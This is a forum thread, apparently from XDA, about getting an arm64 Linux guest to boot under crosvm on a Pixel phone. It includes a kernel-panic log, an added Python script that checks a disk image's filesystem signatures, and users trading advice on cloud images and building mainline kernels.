[ 0.498375] Btrfs loaded, crc32c=crc32c-generic, zoned=yes, fsverity=no
[ 0.499191] Key type encrypted registered
[ 0.657459] ALSA device list:
[ 0.657786] No soundcards found.
[ 0.658355] md: Waiting for all devices to be available before autodetect
[ 0.658953] md: If you don't use raid, use raid=noautodetect
[ 0.659460] md: Autodetecting RAID arrays.
[ 0.659861] md: autorun ...
[ 0.660147] md: ... autorun DONE.
[ 0.664078] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.664970] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.666059] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.666714] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.670343] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x98375fa1)
[ 0.671002] F2FS-fs (vda): Can't find valid F2FS filesystem in 1th superblock
[ 0.672025] F2FS-fs (vda): Magic Mismatch, valid(0xf2f52010) - read(0x65e3faa7)
[ 0.672732] F2FS-fs (vda): Can't find valid F2FS filesystem in 2th superblock
[ 0.673553] List of all partitions:
[ 0.673850] fd00 2552 vda
[ 0.673853] driver: virtio_blk
[ 0.674375] No filesystem could mount root, tried:
[ 0.674377] ext3
[ 0.674706] ext2
[ 0.674854] ext4
[ 0.674988] vfat
[ 0.675161] msdos
[ 0.675411] ntfs3
[ 0.675683] xfs
[ 0.675867] f2fs
[ 0.676014] btrfs
[ 0.676172]
[ 0.676436] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(253,0)
[ 0.677087] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 5.16.13-1-aarch64-ARCH #1
[ 0.677776] Hardware name: linux,dummy-virt (DT)
[ 0.678237] Call trace:
[ 0.678497] dump_backtrace+0x0/0x1cc
[ 0.678848] show_stack+0x18/0x24
[ 0.679114] dump_stack_lvl+0x68/0x84
[ 0.679447] dump_stack+0x18/0x34
[ 0.679729] panic+0x138/0x308
[ 0.679991] mount_block_root+0x1e0/0x1fc
[ 0.680365] mount_root+0x150/0x170
[ 0.680707] prepare_namespace+0x134/0x174
[ 0.681151] kernel_init_freeable+0x20c/0x244
[ 0.681573] kernel_init+0x28/0x140
[ 0.681889] ret_from_fork+0x10/0x20
[ 0.682201] Kernel Offset: disabled
[ 0.682483] CPU features: 0x00,00000302,46600e42
[ 0.682904] Memory Limit: none
[INFO:external/crosvm/src/linux/vcpu.rs:470] system reset event
[INFO:external/crosvm/src/linux/mod.rs:1830] vcpu requested reset
[ERROR:external/crosvm/src/linux/vcpu.rs:739] failed to send VcpuControl: sending on a closed channel
[INFO:external/crosvm/src/main.rs:2872] crosvm has exited normally due to reset request.
Can someone show me how they got it to run?
Thanks Ron
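Added example, not part of the post above or of crosvm: the panic means none of the built-in filesystem drivers found a superblock on vda, and the F2FS lines show the magic it read against the 0xf2f52010 it expects. This host-side check generalizes that comparison to the other formats the kernel tried plus common container formats, so a non-raw or partitioned image can be spotted before booting; the function names and the constructed sample are assumptions of this sketch.

```python
import struct

# (label, byte offset from start of image, magic bytes).
# 0xF2F52010 is the F2FS magic printed in the kernel log above.
SIGNATURES = [
    ("qcow2", 0, b"QFI\xfb"),
    ("gzip", 0, b"\x1f\x8b"),
    ("xfs", 0, b"XFSB"),
    ("mbr-or-fat", 510, b"\x55\xaa"),
    ("gpt", 512, b"EFI PART"),
    ("f2fs", 1024, struct.pack("<I", 0xF2F52010)),
    ("ext2/3/4", 1024 + 56, struct.pack("<H", 0xEF53)),
    ("btrfs", 0x10040, b"_BHRfS_M"),
]
CONTAINERS = {"qcow2", "gzip"}
BOOT_SECTOR = {"mbr-or-fat", "gpt"}

def probe(image: bytes) -> list:
    """Return the labels of every signature present in the image bytes."""
    return [label for label, off, magic in SIGNATURES
            if image[off:off + len(magic)] == magic]

def diagnose(image: bytes) -> str:
    """Map the signatures found to the likely cause of a root-mount failure."""
    hits = set(probe(image))
    if hits & CONTAINERS:
        return "container: convert to a raw image before attaching it as vda"
    if hits - BOOT_SECTOR:
        fs = sorted(hits - BOOT_SECTOR)[0]
        return f"filesystem: {fs} on the whole disk; that driver must be built in"
    if hits & BOOT_SECTOR:
        return "boot sector: partition table or FAT volume; root may be in a partition"
    return "unknown: no known superblock; image is empty, truncated or another format"

def probe_file(path: str) -> str:
    """Diagnose an image file, reading only the region that holds the magics."""
    with open(path, "rb") as fh:
        return diagnose(fh.read(0x10040 + 8))

if __name__ == "__main__":
    # Constructed sample: 128 KiB of zeros carrying only an ext4 superblock magic.
    sample = bytearray(128 * 1024)
    sample[1080:1082] = struct.pack("<H", 0xEF53)
    print(diagnose(bytes(sample)))
```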
Hi Ron / @cron5918. Welcome to XDA. Please in the future use either [quote]stuff[/quote] or [spoiler="Name of stuff"]stuff[/spoiler] for super-long segments of logs or code.
You can Edit your post and insert those items any time if you wouldn't mind. Disregard.
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
I tried Ron's way also, no luck
rgarcia1000 said:
Hi headheadhead
Which cloud image did you use? I tried a couple and got no path to disk
The image I used is this.
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
How are you guys getting / building your kernels? Been trying to get this to work too.
cron5918 said:
Hi Head,
I read what you wrote to Rich..
You are running amd64 on the pixel?
Sorry for the mistake. I ran arm64 on pixel. It is now corrected.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
Use the Linux mainline kernel. You can find several tutorials about building the Linux mainline kernel.
blundergat said:
How are you guys getting / building your kernels? Been trying to get this to work too.
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. Then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Been asking for this also, I don't know if I am building the Kernel right.
Head, if it is not too much trouble, can you show us what you did to build the kernel?
rgarcia1000 said:
I used Linux 5.17-rc3 and compiled.
>make ARCH=aarm64 with allnoconfig. Then I edit the .config file for kvm.
But I still can't get it to mount the root file system.
Thanks for the pointer! I've built kernels in the past, but forgive me for such a stupid question. You're building this on your PC, not your phone, right? I keep getting this error on Arch.
Code:
Makefile:625: arch/aarm64/Makefile: No such file or directory
However I can build doing "make ARCH=arm64".